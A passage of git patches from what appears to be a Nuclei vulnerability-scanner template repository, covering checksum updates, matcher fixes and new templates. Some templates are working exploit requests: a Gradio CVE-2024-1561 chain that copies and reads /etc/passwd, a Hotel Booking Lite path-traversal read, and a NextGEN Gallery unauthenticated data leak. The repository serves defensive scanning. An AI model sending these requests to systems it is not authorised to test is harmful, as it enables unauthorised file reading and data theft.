templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c997b91d4e..9511a8a3df 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3444,7 +3444,7 @@ http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f4a51f27c4e839502e7 http/default-logins/sequoiadb/sequoiadb-default-login.yaml:dabe65c9eef1e73cc13c91f81ef91b44503583c4 http/default-logins/showdoc/showdoc-default-login.yaml:a3fadb617e0f5eab493196fc3422db16dfab647a http/default-logins/smartbi/smartbi-default-login.yaml:62ea338413d060ca9e21ffdacbcd946cd0cfc8a2 -http/default-logins/softether/softether-vpn-default-login.yaml:8d8bbab4f5ccde8a9f50536a71030cb17ac49d89 +http/default-logins/softether/softether-vpn-default-login.yaml:592f93a18fc9a97f31d8a29780dcb874e255d244 http/default-logins/solarwinds/solarwinds-default-login.yaml:37255b4d25b1aed06374df59af8da5a1ff8993cd http/default-logins/sonarqube/sonarqube-default-login.yaml:46757166900a43af2c1587461e43a72a6aabc1b5 http/default-logins/soplanning/soplanning-default-login.yaml:3c498e1990912358f380b450f3d4f18fdfa0ebb1 @@ -6704,7 +6704,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:662ac183c7b67cb50f3b43e94fd9455b9ed79838 +http/technologies/favicon-detect.yaml:7af0d4305d97f9d1f8869a72e244d64936f8ab86 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8496,6 +8496,7 @@ profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8 profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2 +profiles/wordpress.yml:6f7a53edce77971ee3db3990eefbe92e23d7f8f8 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521 @@ -8525,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6cb64eac5b580ac207d5ea00b16ab0ae45dfe7ed +templates-checksum.txt:542b55550827998f7eb58bd6f32a8987dfe28dc1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6105cef88222e16015d4f1923c7eb117020f45df Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 12:23:40 +0000 Subject: [PATCH 0992/1768] Auto Template Signing [Tue May 14 12:23:40 UTC 2024] :robot: --- http/technologies/favicon-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 3e821e1d56..97d338b8eb 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3755,4 +3755,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 4b0a00483046022100c8bddb53fa936be9b6fbc7fd66feb697d5d52aca31e1c86cba815603d6f36b780221008d13bd9355885cd5ce520d970de1599c5380197d0da9109d264f45e61fdc58d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100afa60b596fe20299d482f935df87359f0c8fb824c709cb56ef1f08634909a2000220316c27df890a1e6cb71ae4fe147ccd2465493542520ed705054c5a8df06cc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 69f65998544d0af1309534bba1963ce1ec1a1dfa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 17:54:42 +0530 Subject: [PATCH 0993/1768] minor update --- http/exposed-panels/tiny-rss-panel.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 7d226d6904..460457f73e 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -22,7 +22,6 @@ http: matchers: - type: dsl dsl: - - 'status_code==200 && contains(tolower(body), "Tiny Tiny RSS")' - - 'status_code==200 && contains(tolower(body), "ttrss_login")' - - 'status_code==200 && contains(tolower(body), "ttrss_utility")' + - 'status_code==200' + - 'contains_all(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")' condition: and From d7a19ee52a18f93e085cba62432b2e118c4cd3fa Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 18:07:52 +0530 Subject: [PATCH 0994/1768] minor update --- http/cves/2023/CVE-2023-5991.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-5991.yaml b/http/cves/2023/CVE-2023-5991.yaml index 88a964407e..1f67bfe17d 100644 --- a/http/cves/2023/CVE-2023-5991.yaml +++ b/http/cves/2023/CVE-2023-5991.yaml @@ -6,6 +6,7 @@ info: severity: critical description: | The Hotel Booking Lite WordPress plugin before 4.8.5 does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server + remediation: Fixed in 4.8.5 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-5991 - https://wpscan.com/vulnerability/e9d35e36-1e60-4483-b8b3-5cbf08fcd49e/ @@ -15,13 +16,16 @@ info: cve-id: CVE-2023-5991 cwe-id: CWE-22 epss-score: 0.00603 - epss-percentile: 0.78406 + epss-percentile: 0.78412 cpe: cpe:2.3:a:motopress:hotel_booking_lite:*:*:*:*:*:wordpress:*:* metadata: + verified: true + max-request: 1 vendor: motopress product: hotel_booking_lite framework: wordpress - tags: cve,cve2023,lfi,hbl,hotel + publicwww-query: "/wp-content/plugins/motopress-hotel-booking" + tags: cve,cve2023,lfi,motopress-hotel-booking,wordpress,wp-plugin,wpscan,wp http: - method: GET @@ -31,6 +35,7 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" From 5ce723d9824ec5f0d05d0bc2e1b18d6c86b7ce85 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 22:31:40 +0530 Subject: [PATCH 0995/1768] Create CVE-2024-1561.yaml --- http/cves/2024/CVE-2024-1561.yaml | 82 +++++++++++++++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1561.yaml diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml new file mode 100644 index 0000000000..89b984cf12 --- /dev/null +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -0,0 +1,82 @@ +id: CVE-2024-1561 + +info: + name: Gradio Applications - Unauthorized Local File Read + author: Diablo + severity: high + description: | + Local file read by calling arbitrary methods of Components class + impact: | + Successful exploitation of this vulnerability could allow an attacker to read files on the server + remediation: | + Update to Gradio 4.13.0 + reference: + - https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338 + - https://github.com/DiabloHTB/CVE-2024-1561 + - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561 + - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-1561 + cwe-id: CWE-29 + epss-score: 0.00045 + epss-percentile: 0.14639 + metadata: + verified: true + max-request: 3 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,intrusive,unauth,gradio,lfi + +flow: http(1) && http(2) && http(3) + +http: + - raw: + - | + GET /config HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: json + name: first-component + part: body + group: 1 + json: + - '.components[0].id' + internal: true + + - raw: + - | + POST /component_server HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"component_id": "{{first-component}}", + "data": "/etc/passwd", + "fn_name": "move_resource_to_block_cache", + "session_hash": "aaaaaaaaaaa"} + + extractors: + - type: regex + name: tmpath + regex: + - "/(?P<hash>[a-fA-F0-9]+)/" + internal: true + + - raw: + - | + GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0:" + + - type: word + part: header + words: + - "text/plain" From 29db5710b6758e2e38a752188e7bd4b493b8d9a2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Tue, 14 May 2024 22:35:12 +0530 Subject: [PATCH 0996/1768] fix trail space --- http/cves/2024/CVE-2024-1561.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 89b984cf12..0ff2b8859f 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -47,7 +47,7 @@ http: internal: true - raw: - - | + - | POST /component_server HTTP/1.1 Host: {{Hostname}} Content-Type: application/json @@ -60,7 +60,7 @@ http: extractors: - type: regex name: tmpath - regex: + regex: - "/(?P<hash>[a-fA-F0-9]+)/" internal: true From 3a99b64d6ac1eeca5447a83543d3de7d83c23499 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 01:12:14 +0530 Subject: [PATCH 0997/1768] minor update --- http/cves/2024/CVE-2024-1561.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 0ff2b8859f..6f4697e481 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -60,13 +60,13 @@ http: extractors: - type: regex name: tmpath - regex: - - "/(?P<hash>[a-fA-F0-9]+)/" + regex: + - \/[a-zA-Z0-9\/]+ internal: true - raw: - | - GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1 + GET /file={{tmpath}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and From 76488cade30fe73b73df0833a63d86d866d9222a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 01:16:04 +0530 Subject: [PATCH 0998/1768] fix trail space --- http/cves/2024/CVE-2024-1561.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 6f4697e481..1fe5e8dc1f 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -60,7 +60,7 @@ http: extractors: - type: regex name: tmpath - regex: + regex: - \/[a-zA-Z0-9\/]+ internal: true From 89a07bbb42e52bce1906c94cac88658848bf76de Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 01:30:29 +0530 Subject: [PATCH 0999/1768] Create CVE-2024-3097.yaml --- http/cves/2024/CVE-2024-3097.yaml | 50 +++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3097.yaml diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml new file mode 100644 index 0000000000..d8356d638a --- /dev/null +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-3097 + +info: + name: NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure + author: DhiyanesDK + severity: medium + description: | + The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin. + reference: + - https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/REST/Admin/Block.php#L40 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/75f87f99-9f0d-46c2-a6f1-3c1ea0176303?source=cve + - https://zpbrent.github.io/pocs/8-plugin-nextgen-gallery-InfoDis-20240327.mp4 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-3097 + cwe-id: CWE-862 + epss-score: 0.00052 + epss-percentile: 0.19521 + cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* + metadata: + vendor: imagely + product: nextgen_gallery + framework: wordpress + publicwww-query: "/wp-content/plugins/nextgen-gallery/" + tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak + +http: + - method: GET + path: + - "{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":' + - '"image":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 From 6d093ed2160196ccf437400f30b5b29fb697ef0c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Wed, 15 May 2024 02:27:52 +0530 Subject: [PATCH 1000/1768] Create froxlor-installer.yaml --- .../installer/froxlor-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/froxlor-installer.yaml diff --git a/http/misconfiguration/installer/froxlor-installer.yaml b/http/misconfiguration/installer/froxlor-installer.yaml new file mode 100644 index 0000000000..4bee3970e4 --- /dev/null +++ b/http/misconfiguration/installer/froxlor-installer.yaml @@ -0,0 +1,31 @@ +id: froxlor-installer + +info: + name: Froxlor Server Management - Installer + author: DhiyaneshDK + severity: high + description: | + Detects the Froxlor Server Management Panel installation page. + reference: + - https://www.exploit-db.com/ghdb/8397 + metadata: + verified: true + max-request: 1 + fofa-query: title="Froxlor Server Management Panel - Installation" + tags: misconfig,froxlor,installer,setup + +http: + - method: GET + path: + - "{{BaseURL}}/install/install.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Froxlor Server Management Panel - Installation" + + - type: status + status: + - 200 From 23ca54c9b138c78d3f418d1ab08a15fcd6a46399 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 15 May 2024 02:39:46 +0530 Subject: [PATCH 1001/1768] Create custom-xoops-installer.yaml --- .../installer/custom-xoops-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/custom-xoops-installer.yaml diff --git a/http/misconfiguration/installer/custom-xoops-installer.yaml b/http/misconfiguration/installer/custom-xoops-installer.yaml new file mode 100644 index 0000000000..6af3ad2175 --- /dev/null +++ b/http/misconfiguration/installer/custom-xoops-installer.yaml @@ -0,0 +1,31 @@ +id: custom-xoops-installer + +info: + name: XOOPS Custom Installer - Exposed + author: DhiyaneshDK + severity: high + description: | + Detects the presence of XOOPS Custom installation page. + reference: + - https://www.exploit-db.com/ghdb/1115 + metadata: + verified: true + max-request: 1 + fofa-query: title="XOOPS Custom Installation" + tags: misconfig,xoops,installer,setup + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "XOOPS Custom Installation" + + - type: status + status: + - 200 From d7b685edbc321ca0b3a3c7076fbcf4bf069a4d20 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:52:32 +0300 Subject: [PATCH 1002/1768] Update gocd-unauth-dashboard.yaml --- http/misconfiguration/gocd/gocd-unauth-dashboard.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 41aa0dee99..7bf379bbc8 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -7,7 +7,7 @@ info: description: GoCd Dashboard is exposed. metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: go,gocd,unauth,misconfig http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022039ea9bdb750a12ccc3a1ed4f126dc46e57f112649d35b2ed182a654a048ea4ad022100d4c117105dea72d50f8721c3c173dc0dd54cac8ffa896fd7f2ef5b4525f1f90a:922c64590222798bb761d5b6d8e72950 From 9ea72310a045c243714b080bc3a59f2df50345cb Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:53:18 +0300 Subject: [PATCH 1003/1768] Update gocd-encryption-key.yaml --- http/misconfiguration/gocd/gocd-encryption-key.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index c8868e7ca9..93ae128e3e 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: go,gocd,exposure,misconfig http: @@ -38,4 +38,4 @@ http: - type: regex regex: - "([a-z0-9]){32}" -# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ac41f33e34d969b020ee864720a58cdc98c17066213906ca0a6703759bee6260220648ad5ffaa33adc1a318395cd2da424417fb64cf1ed962a0bb6da6cf73514c09:922c64590222798bb761d5b6d8e72950 From 1d6a95a7bc91a36d53a95ff2e683348f7eb8fe30 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:54:20 +0300 Subject: [PATCH 1004/1768] Update gocd-cruise-configuration.yaml --- http/misconfiguration/gocd/gocd-cruise-configuration.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index 8e72c43c6b..cf581b6731 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 metadata: max-request: 1 - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: go,gocd,config,exposure,misconfig http: @@ -31,4 +31,4 @@ http: - "webhookSecret" - "tokenGenerationKey" condition: and -# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d2fd1e9ecc4854d8aa9b0188c42e1c8a4dab6cf811a1c1b0ddefca324d1de1c02210084d971bcf96b13508ede2ea3a0c92d437bdfc34c2d22d5ea4437328690cec9e1:922c64590222798bb761d5b6d8e72950 From 642c7a372a2584d1640473993c0bb872a8858d86 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Wed, 15 May 2024 02:55:09 +0300 Subject: [PATCH 1005/1768] Update CVE-2021-43287.yaml --- http/cves/2021/CVE-2021-43287.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index 91d85419f6..e8a9f41d78 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thoughtworks product: gocd - shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" tags: cve2021,cve,go,lfi,gocd,thoughtworks http: @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204609e2e1895643baf7cdc7ad60281688e3476109ccc5ce2ccb2cf0270ebfbfc5022019685f6fa856fe84479cc12e3f1f631a79582a35c1f30fb624a042c867cad5c7:922c64590222798bb761d5b6d8e72950 From 8ce47f6e11dae574f388d1d84b92271295f1798d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 23:56:54 +0000 Subject: [PATCH 1006/1768] Auto Generated Templates Checksum [Tue May 14 23:56:54 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9511a8a3df..3a67f42efa 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5333,7 +5333,7 @@ http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc http/misconfiguration/gocd/gocd-cruise-configuration.yaml:5d6cff182941ab13f63a9670759c38e35bf48200 -http/misconfiguration/gocd/gocd-encryption-key.yaml:a74d049cb9d02c3ab676794fcb6eb8905b175dd7 +http/misconfiguration/gocd/gocd-encryption-key.yaml:b5515851c8e9d9819cbf17b6d7eb42437a00ebc6 http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238 @@ -6704,7 +6704,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:7af0d4305d97f9d1f8869a72e244d64936f8ab86 +http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:542b55550827998f7eb58bd6f32a8987dfe28dc1 +templates-checksum.txt:443a567bd8b88ffc4284def78c3dc2e03374c457 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 165101ae4138644e9c12db34839e606055382cf5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 23:57:31 +0000 Subject: [PATCH 1009/1768] Auto Generated Templates Checksum [Tue May 14 23:57:31 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3a67f42efa..ccd528e555 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2349,7 +2349,7 @@ http/cves/2021/CVE-2021-42663.yaml:f3023c6a997a0d8027972baaaf23a96c5c8e884b http/cves/2021/CVE-2021-42667.yaml:c19169cb40060f91bb99ef5323b157fa0fbf6297 http/cves/2021/CVE-2021-42887.yaml:dfe8d47da07a7c37b5294acdd283c4c27dbdf753 http/cves/2021/CVE-2021-43062.yaml:a2a6ba5ec2ce275fa2ffbb6b19af1b20dfc0a0c3 -http/cves/2021/CVE-2021-43287.yaml:86f5633bd3e4a0df1cdc3cf229d5f6c94da694d8 +http/cves/2021/CVE-2021-43287.yaml:86d4216d1418d3ee400ea98a2aa9ff407d4c7db0 http/cves/2021/CVE-2021-43421.yaml:d3b512996e80ab08eaec03df406c88aa78376ac9 http/cves/2021/CVE-2021-43495.yaml:7976f205a306ddb65f565049e3f4451bd9a5ce92 http/cves/2021/CVE-2021-43496.yaml:1241385fad2c3dee60c598304d8dc5b177d94c32 @@ -5332,7 +5332,7 @@ http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a5 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc -http/misconfiguration/gocd/gocd-cruise-configuration.yaml:5d6cff182941ab13f63a9670759c38e35bf48200 +http/misconfiguration/gocd/gocd-cruise-configuration.yaml:36a522bd05c12da13079058f75e0d272007728a5 http/misconfiguration/gocd/gocd-encryption-key.yaml:b5515851c8e9d9819cbf17b6d7eb42437a00ebc6 http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f @@ -8526,7 +8526,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:443a567bd8b88ffc4284def78c3dc2e03374c457 +templates-checksum.txt:fde380a18fd424d1fb883d41dda45c0b95784e5c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d794820170a6c1abfe211d8086926eb5b12ecc92 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 23:58:33 +0000 Subject: [PATCH 1011/1768] Auto Template Signing [Tue May 14 23:58:33 UTC 2024] :robot: --- http/misconfiguration/gocd/gocd-encryption-key.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 